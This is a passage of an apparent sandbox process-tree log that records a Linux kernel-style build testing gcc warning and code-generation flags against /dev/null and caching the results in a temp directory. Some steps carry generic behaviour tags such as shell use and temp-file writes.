/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fno-delete-null-pointer-checks\";_else_echo_\"\";_fi := -fno-delete-null-pointer-checks' >> /tmp/a/.cache.mk"3⤵PID:1880
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wframe-address -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-frame-address\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1881 -
/bin/mkdirmkdir -p /tmp/a/.tmp_18814⤵PID:1882
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wframe-address -c -x c /dev/null -o /tmp/a/.tmp_1881/tmp4⤵PID:1883
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1881/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wframe-address "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -o -5⤵PID:1884
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1881/tmp5⤵PID:1885
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1881/tmp5⤵PID:1885
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1881/tmp5⤵PID:1885
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1881/tmp5⤵
- Writes file to tmp directory
PID:1885 -
/bin/rmrm -rf /tmp/a/.tmp_18814⤵PID:1886
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wframe-address_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-frame-address\";_else_echo_\"\";_fi := -Wno-frame-address' >> /tmp/a/.cache.mk"3⤵PID:1887
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wformat-truncation -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-format-truncation\"; else echo \"\"; fi"3⤵PID:1888
-
/bin/mkdirmkdir -p /tmp/a/.tmp_18884⤵
- Reads runtime system information
PID:1889 -
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wformat-truncation -c -x c /dev/null -o /tmp/a/.tmp_1888/tmp4⤵PID:1890
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1888/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=1" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -o -5⤵PID:1891
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1888/tmp5⤵PID:1892
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1888/tmp5⤵PID:1892
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1888/tmp5⤵PID:1892
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1888/tmp5⤵PID:1892
-
/bin/rmrm -rf /tmp/a/.tmp_18884⤵PID:1893
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wformat-truncation_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-format-truncation\";_else_echo_\"\";_fi := -Wno-format-truncation' >> /tmp/a/.cache.mk"3⤵PID:1894
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wformat-overflow -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-format-overflow\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1895 -
/bin/mkdirmkdir -p /tmp/a/.tmp_18954⤵
- Reads runtime system information
PID:1896 -
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wformat-overflow -c -x c /dev/null -o /tmp/a/.tmp_1895/tmp4⤵PID:1897
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1895/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=1" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -o -5⤵PID:1898
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1895/tmp5⤵PID:1899
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1895/tmp5⤵PID:1899
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1895/tmp5⤵PID:1899
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1895/tmp5⤵
- Writes file to tmp directory
PID:1899 -
/bin/rmrm -rf /tmp/a/.tmp_18954⤵PID:1900
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wformat-overflow_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-format-overflow\";_else_echo_\"\";_fi := -Wno-format-overflow' >> /tmp/a/.cache.mk"3⤵PID:1901
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wint-in-bool-context -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-int-in-bool-context\"; else echo \"\"; fi"3⤵PID:1902
-
/bin/mkdirmkdir -p /tmp/a/.tmp_19024⤵PID:1903
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wint-in-bool-context -c -x c /dev/null -o /tmp/a/.tmp_1902/tmp4⤵PID:1904
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1902/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wint-in-bool-context "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -o -5⤵PID:1905
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1902/tmp5⤵PID:1906
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1902/tmp5⤵PID:1906
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1902/tmp5⤵PID:1906
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1902/tmp5⤵
- Writes file to tmp directory
PID:1906 -
/bin/rmrm -rf /tmp/a/.tmp_19024⤵PID:1907
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wint-in-bool-context_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-int-in-bool-context\";_else_echo_\"\";_fi := -Wno-int-in-bool-context' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1908 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 